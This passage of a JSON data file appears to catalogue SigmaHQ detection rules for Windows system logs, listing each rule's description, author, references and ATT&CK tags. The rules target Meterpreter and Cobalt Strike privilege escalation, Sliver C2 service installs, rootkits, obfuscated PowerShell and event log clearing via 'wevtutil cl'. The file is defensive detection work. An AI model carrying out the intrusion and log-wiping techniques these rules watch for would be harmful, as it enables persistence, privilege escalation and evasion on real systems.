"windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_folder.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "car.2013-09-005", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5e993621-67d4-488a-b9ae-b420d08b96cb", "value": "Service Installation in Suspicious Folder" }, { "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", "meta": { "author": "Tim Rauch (Nextron Systems), Elastic (idea)", "creation_date": "2022-09-15", "falsepositive": [ "Unknown" ], "filename": "win_system_service_install_sups_unusal_client.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_sups_unusal_client.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543" ] }, "related": [ { "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", "value": "Service Installed By Unusual Client - System" }, { "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", "meta": { "author": "Bhabesh Raj", "creation_date": "2021-05-06", "falsepositive": [ "Unknown" ], "filename": "win_system_moriya_rootkit.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_moriya_rootkit.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "25b9c01c-350d-4b95-bed1-836d04a4f324", "value": "Moriya Rootkit - System" }, { "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_mshta_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", "value": "Invoke-Obfuscation Via Use MSHTA - System" }, { "description": "Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-11-28", "falsepositive": [ "Legitimate use of the tool" ], "filename": "win_system_service_install_mesh_agent.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_mesh_agent.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", "value": "Mesh Agent Service Installation" }, { "description": "Detects suspicious service installation scripts", "meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2022-03-18", "falsepositive": [ "Unknown" ], "filename": "win_system_susp_service_installation_script.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_script.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "car.2013-09-005", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", "value": "Suspicious Service Installation Script" }, { "description": "Detects service installation with suspicious folder patterns", "meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2022-03-18", "falsepositive": [ "Unknown" ], "filename": "win_system_susp_service_installation_folder_pattern.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_folder_pattern.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "car.2013-09-005", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", "value": "Service Installation with Suspicious Folder Pattern" }, { "description": "Detects RemCom service installation and execution events", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-07", "falsepositive": [ "Unknown" ], "filename": "win_system_service_install_remcom.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/kavika13/RemCom/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_remcom.yml" ], "tags": [ "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e36ed87-4986-482e-8e3b-5c23ffff11bf", "value": "RemCom Service Installation" }, { "description": "Detects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded powershell commands, temporary paths, etc.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-18", "falsepositive": [ "Unknown" ], "filename": "win_system_service_install_uncommon.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_uncommon.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "car.2013-09-005", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "26481afe-db26-4228-b264-25a29fe6efc7", "value": "Uncommon Service Installation Image Path" }, { "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", "meta": { "author": "Teymur Kheirkhabarov, Ecco, Florian Roth (Nextron Systems)", "creation_date": "2019-10-26", "falsepositive": [ "Unlikely" ], "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1134.001", "attack.t1134.002" ] }, "related": [ { "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - System" }, { "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "win_system_invoke_obfuscation_clip_services.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_clip_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f7385ee2-0e0c-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation CLIP+ Launcher - System" }, { "description": "Detects CSExec service installation and execution events", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-07", "falsepositive": [ "Unknown" ], "filename": "win_system_service_install_csexecsvc.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/malcomvetter/CSExec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_csexecsvc.yml" ], "tags": [ "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a27e5fa9-c35e-4e3d-b7e0-1ce2af66ad12", "value": "CSExec Service Installation" }, { "description": "Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-11", "falsepositive": [ "Legitimate usage of the anydesk tool" ], "filename": "win_system_service_install_anydesk.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_anydesk.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "530a6faa-ff3d-4022-b315-50828e77eef5", "value": "Anydesk Remote Access Software Service Installation" }, { "description": "Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-11-28", "falsepositive": [ "Legitimate use of the tool" ], "filename": "win_system_service_install_tacticalrmm.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_tacticalrmm.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4bb79b62-ef12-4861-981d-2aab43fab642", "value": "TacticalRMM Service Installation" }, { "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-22", "falsepositive": [ "Legitimate use of the tool" ], "filename": "win_system_service_install_pdqdeploy.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_pdqdeploy.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", "value": "New PDQDeploy Service - Server Side" }, { "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-25", "falsepositive": [ "Unknown" ], "filename": "win_system_service_install_sliver.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_sliver.yml" ], "tags": [ "attack.execution", "attack.privilege-escalation", "attack.t1543.003", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", "value": "Sliver C2 Default Service Installation" }, { "description": "Detects Obfuscated use of stdin to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "win_system_invoke_obfuscation_stdin_services.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_stdin_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "72862bf2-0eb1-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation STDIN+ Launcher - System" }, { "description": "Detects PsExec service installation and execution events", "meta": { "author": "Thomas Patzke", "creation_date": "2017-06-12", "falsepositive": [ "Unknown" ], "filename": "win_system_service_install_sysinternals_psexec.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://jpcertcc.github.io/ToolAnalysisResultSheet", "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_sysinternals_psexec.yml" ], "tags": [ "attack.execution", "attack.t1569.002", "attack.s0029" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "42c575ea-e41e-41f1-b248-8093c3e82a28", "value": "PsExec Service Installation" }, { "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_clip_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "63e3365d-4824-42d8-8b82-e56810fefa0c", "value": "Invoke-Obfuscation Via Use Clip - System" }, { "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-01-11", "falsepositive": [ "Unlikely" ], "filename": "win_system_ntfs_vuln_exploit.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/", "https://twitter.com/jonasLyk/status/1347900440000811010", "https://twitter.com/wdormann/status/1347958161609809921", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/ntfs/win_system_ntfs_vuln_exploit.yml" ], "tags": [ "attack.impact", "attack.t1499.001" ] }, "related": [ { "dest-uuid": "0df05477-c572-4ed6-88a9-47c581f548f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f14719ce-d3ab-4e25-9ce6-2899092260b0", "value": "NTFS Vulnerability Exploitation" }, { "description": "Detects application popup reporting a failure of the Sysmon service", "meta": { "author": "Tim Shelton", "creation_date": "2022-04-26", "falsepositive": [ "Unknown" ], "filename": "win_system_application_sysmon_crash.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1803/W10_1803_Pro_19700101_17134.1/WEPExplorer/Application%20Popup.xml#L36", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/application_popup/win_system_application_sysmon_crash.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4d7f1827-1637-4def-8d8a-fd254f9454df", "value": "Sysmon Application Crashed" }, { "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", "meta": { "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", "creation_date": "2019-05-24", "falsepositive": [ "Bad connections or network interruptions" ], "filename": "win_system_rdp_potential_cve_2019_0708.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/Ekultek/BlueKeep", "https://web.archive.org/web/20190710034152/https://github.com/zerosum0x0/CVE-2019-0708", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/termdd/win_system_rdp_potential_cve_2019_0708.yml" ], "tags": [ "attack.lateral-movement", "attack.t1210", "car.2013-07-002" ] }, "related": [ { "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aaa5b30d-f418-420b-83a0-299cb6024885", "value": "Potential RDP Exploit CVE-2019-0708" }, { "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", "meta": { "author": "Dimitrios Slamaris", "creation_date": "2017-05-15", "falsepositive": [ "Unknown" ], "filename": "win_system_susp_dhcp_config.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", "value": "DHCP Server Loaded the CallOut DLL" }, { "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", "meta": { "author": "Dimitrios Slamaris, @atc_project (fix)", "creation_date": "2017-05-15", "falsepositive": [ "Unknown" ], "filename": "win_system_susp_dhcp_config_failed.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config_failed.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "75edd3fd-7146-48e5-9848-3013d7f0282c", "value": "DHCP Server Error Failed Loading the CallOut DLL" }, { "description": "Detects volume shadow copy mount via Windows event log", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "creation_date": "2020-10-20", "falsepositive": [ "Legitimate use of volume shadow copy mounts (backups maybe)." ], "filename": "win_system_volume_shadow_copy_mount.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_ntfs/win_system_volume_shadow_copy_mount.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f512acbf-e662-4903-843e-97ce4652b740", "value": "Volume Shadow Copy Mount" }, { "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-11-09", "falsepositive": [ "Unknown" ], "filename": "win_system_kdcsvc_rc4_downgrade.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_rc4_downgrade.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "e6f81941-b1cd-4766-87db-9fc156f658ee", "value": "KDC RC4-HMAC Downgrade CVE-2022-37966" }, { "description": "Detects a user certificate that was valid but could not be mapped to a user in a strong way (such as via explicit mapping, key trust mapping, or a SID)\nThis could be a sign of exploitation of the elevation of privilege vulnerabilities (CVE-2022-34691, CVE-2022-26931, CVE-2022-26923) that can occur when the KDC allows certificate spoofing by not requiring a strong mapping.\nEvents where the AccountName and CN of the Subject do not match, or where the CN ends in a dollar sign indicating a machine, may indicate certificate spoofing.\n", "meta": { "author": "@br4dy5", "creation_date": "2023-10-09", "falsepositive": [ "If prevalent in the environment, filter on events where the AccountName and CN of the Subject do not reference the same user", "If prevalent in the environment, filter on CNs that end in a dollar sign indicating it is a machine name" ], "filename": "win_system_kdcsvc_cert_use_no_strong_mapping.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_cert_use_no_strong_mapping.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "993c2665-e6ef-40e3-a62a-e1a97686af79", "value": "Certificate Use With No Strong Mapping" }, { "description": "Detects errors when a target server doesn't have suitable keys for generating kerberos tickets.\nThis issue can occur for example when a service uses a user account or a computer account that is configured for only DES encryption on a computer that is running Windows 7 which has DES encryption for Kerberos authentication disabled.\n", "meta": { "author": "@SerkinValery", "creation_date": "2024-03-07", "falsepositive": [ "Unknown" ], "filename": "win_system_kdcsvc_tgs_no_suitable_encryption_key_found.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd348773(v=ws.10)", "https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/kdc-event-16-27-des-encryption-disabled", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_tgs_no_suitable_encryption_key_found.yml" ], "tags": [ "attack.credential-access", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b1e0b3f5-b62e-41be-886a-daffde446ad4", "value": "No Suitable Encryption Key Found For Generating Kerberos Ticket" }, { "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-10-07", "falsepositive": [ "Unknown" ], "filename": "win_system_lpe_indicators_tabtip.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/antonioCoco/JuicyPotatoNG", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_distributed_com/win_system_lpe_indicators_tabtip.yml" ], "tags": [ "attack.execution", "attack.t1557.001" ] }, "related": [ { "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", "value": "Local Privilege Escalation Indicator TabTip" }, { "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-01-10", "falsepositive": [ "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", "System provisioning (system reset before the golden image creation)" ], "filename": "win_system_eventlog_cleared.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/deviouspolack/status/832535435960209408", "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_eventlog/win_system_eventlog_cleared.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.001", "car.2016-04-002" ] }, "related": [ { "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", "value": "Eventlog Cleared" }, { "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", "meta": { "author": "Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-05-17", "falsepositive": [ "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", "System provisioning (system reset before the golden image creation)" ], "filename": "win_system_susp_eventlog_cleared.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/deviouspolack/status/832535435960209408", "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_eventlog/win_system_susp_eventlog_cleared.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.001", "car.2016-04-002" ] }, "related": [ { "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "100ef69e-3327-481c-8e5c-6d80d9507556", "value": "Important Windows Eventlog Cleared" }, { "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-05-08", "falsepositive": [ "Unknown" ], "filename": "win_dns_server_susp_server_level_plugin_dll.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx", 